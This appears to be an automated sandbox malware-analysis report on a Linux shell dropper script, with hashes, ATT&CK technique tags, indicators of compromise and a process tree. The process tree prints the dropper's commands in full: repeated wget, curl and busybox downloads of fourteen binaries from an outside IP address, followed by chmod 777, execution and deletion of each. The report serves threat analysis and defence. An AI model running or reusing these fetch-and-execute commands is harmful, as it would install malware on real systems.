3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a

General

Target

3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
Size

10KB
MD5

e54d8700e6358f16715e8ef228b233b5
SHA1

2ca2659f90f6049ca61904ab718ac6977d98c158
SHA256

3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a
SHA512

bba349a7c47bf864182506b7566ffc31187f0172c915e774a999667b78c355711f5ef30944d0f3dd57b98f2c8aa937245bcf994b33703011343d9f85a71dfbb7
SSDEEP

192:W8dUisZBCCvOjsl9/7IJxxMCCvOyi/7IJxxUx:W8dJeBCCvOjslJCCvOy7O

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

755 chmod
778 chmod
790 chmod
802 chmod
772 chmod
822 chmod
667 chmod
710 chmod
796 chmod
814 chmod
684 chmod
730 chmod
784 chmod
808 chmod

pid	process
755	chmod
778	chmod
790	chmod
802	chmod
772	chmod
822	chmod
667	chmod
710	chmod
796	chmod
814	chmod
684	chmod
730	chmod
784	chmod
808	chmod

Executes dropped EXE 14 IoCs

Processes:

IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEsX7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGameUaCVONIwD2kPO0UftouJpzEC9IaOhtKJzoHjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8lXv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX0AUIrkabDiBXKRxx6A855rzwcpfvqephPUh2ekxkemHtCtZcC4gYVjwZSiBE3g2294hbNlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvuWzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPtgO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eSwxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MMIXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u

ioc	pid	process
/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7	668	IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs	686	WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame	712	X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo	732	UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l	757	Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX	773	Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU	779	0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb	785	h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu	791	NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt	797	WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu	803	gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS	809	32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM	815	wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u	823	IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u

Checks CPU configuration 1 TTPs 14 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo	curl
File opened for modification	/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu	curl
File opened for modification	/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u	curl
File opened for modification	/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame	curl
File opened for modification	/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU	curl
File opened for modification	/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb	curl
File opened for modification	/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu	curl
File opened for modification	/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt	curl
File opened for modification	/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7	curl
File opened for modification	/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX	curl
File opened for modification	/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS	curl
File opened for modification	/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs	curl
File opened for modification	/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l	curl
File opened for modification	/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM	curl

/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
/tmp/3898a73a999a6aa59e7881e4d0621a517f8e708e4d6590d43ab136ded2ee595a.sh
1⤵
PID:633

/bin/rm
/bin/rm bins.sh
2⤵
PID:635

/usr/bin/wget
wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
PID:641

/usr/bin/curl
curl -O http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:658

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
PID:665

/bin/chmod
chmod 777 IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- File and Directory Permissions Modification
PID:667

/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
./IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
- Executes dropped EXE
PID:668

/bin/rm
rm IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7
2⤵
PID:669

/usr/bin/wget
wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
PID:670

/usr/bin/curl
curl -O http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:671

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
PID:677

/bin/chmod
chmod 777 WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- File and Directory Permissions Modification
PID:684

/tmp/WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
./WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
- Executes dropped EXE
PID:686

/bin/rm
rm WoFV0gAChqq3Oog1MBm5bddrN7HgDvxhEs
2⤵
PID:687

/usr/bin/wget
wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
PID:688

/usr/bin/curl
curl -O http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
PID:704

/bin/chmod
chmod 777 X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- File and Directory Permissions Modification
PID:710

/tmp/X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
./X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
- Executes dropped EXE
PID:712

/bin/rm
rm X7gHCn7tdqT21Vh65w2Y0Vt6XcLdItGame
2⤵
PID:713

/usr/bin/wget
wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
PID:714

/usr/bin/curl
curl -O http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
PID:729

/bin/chmod
chmod 777 UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- File and Directory Permissions Modification
PID:730

/tmp/UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
./UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
- Executes dropped EXE
PID:732

/bin/rm
rm UaCVONIwD2kPO0UftouJpzEC9IaOhtKJzo
2⤵
PID:734

/usr/bin/wget
wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
PID:735

/usr/bin/curl
curl -O http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:742

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
PID:748

/bin/chmod
chmod 777 Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- File and Directory Permissions Modification
PID:755

/tmp/Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
./Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
- Executes dropped EXE
PID:757

/bin/rm
rm Hjiy0KcC8Q7pj5FhUhyrTGl0lOjD5oPW8l
2⤵
PID:758

/usr/bin/wget
wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:759

/usr/bin/curl
curl -O http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:766

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:771

/bin/chmod
chmod 777 Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- File and Directory Permissions Modification
PID:772

/tmp/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
./Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
- Executes dropped EXE
PID:773

/bin/rm
rm Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:774

/usr/bin/wget
wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:775

/usr/bin/curl
curl -O http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:776

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:777

/bin/chmod
chmod 777 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- File and Directory Permissions Modification
PID:778

/tmp/0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
./0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
- Executes dropped EXE
PID:779

/bin/rm
rm 0AUIrkabDiBXKRxx6A855rzwcpfvqephPU
2⤵
PID:780

/usr/bin/wget
wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:781

/usr/bin/curl
curl -O http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:783

/bin/chmod
chmod 777 h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- File and Directory Permissions Modification
PID:784

/tmp/h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
./h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
- Executes dropped EXE
PID:785

/bin/rm
rm h2ekxkemHtCtZcC4gYVjwZSiBE3g2294hb
2⤵
PID:786

/usr/bin/wget
wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
PID:787

/usr/bin/curl
curl -O http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:788

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
PID:789

/bin/chmod
chmod 777 NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- File and Directory Permissions Modification
PID:790

/tmp/NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
./NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
- Executes dropped EXE
PID:791

/bin/rm
rm NlXFnwJvl5zcF32ASDEihVcqtkqcEAQzvu
2⤵
PID:792

/usr/bin/wget
wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
PID:793

/usr/bin/curl
curl -O http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
PID:795

/bin/chmod
chmod 777 WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- File and Directory Permissions Modification
PID:796

/tmp/WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
./WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
- Executes dropped EXE
PID:797

/bin/rm
rm WzJMIv7n4VRPKxTCtqoEvVNT2PpjCfXtPt
2⤵
PID:798

/usr/bin/wget
wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
PID:799

/usr/bin/curl
curl -O http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:800

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
PID:801

/bin/chmod
chmod 777 gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- File and Directory Permissions Modification
PID:802

/tmp/gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
./gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
- Executes dropped EXE
PID:803

/bin/rm
rm gO8Guv4V77MWdBeCUSB4XTGGohohYLgEsu
2⤵
PID:804

/usr/bin/wget
wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
PID:805

/usr/bin/curl
curl -O http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
PID:807

/bin/chmod
chmod 777 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- File and Directory Permissions Modification
PID:808

/tmp/32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
./32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
- Executes dropped EXE
PID:809

/bin/rm
rm 32WaeS7m7kFm1sxDXdKrW3UlPDmC2Kk2eS
2⤵
PID:810

/usr/bin/wget
wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
PID:811

/usr/bin/curl
curl -O http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
PID:813

/bin/chmod
chmod 777 wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- File and Directory Permissions Modification
PID:814

/tmp/wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
./wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
- Executes dropped EXE
PID:815

/bin/rm
rm wxBHZtvGBWHnJ8M1W941EsKM8ErEGeZ9MM
2⤵
PID:816

/usr/bin/wget
wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:817

/usr/bin/curl
curl -O http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:820

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:821

/bin/chmod
chmod 777 IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- File and Directory Permissions Modification
PID:822

/tmp/IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
./IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
- Executes dropped EXE
PID:823

/bin/rm
rm IXIKzc1Pvao8ODwSK7xhD8lcjTaVcvgb4u
2⤵
PID:824

/usr/bin/wget
wget http://87.120.84.230/bins/Xv97HtQNohUBDy2tLDZ50dX4llWiiOkuUX
2⤵
PID:825

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

1

T1222

Linux and Mac File and Directory Permissions Modification

1

T1222.002

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Credential Access

Discovery

Virtualization/Sandbox Evasion

1

T1497

System Checks

1

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/IY3PdRqAOppVwtyy3BWfmEFBw6kZvcZmb7

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads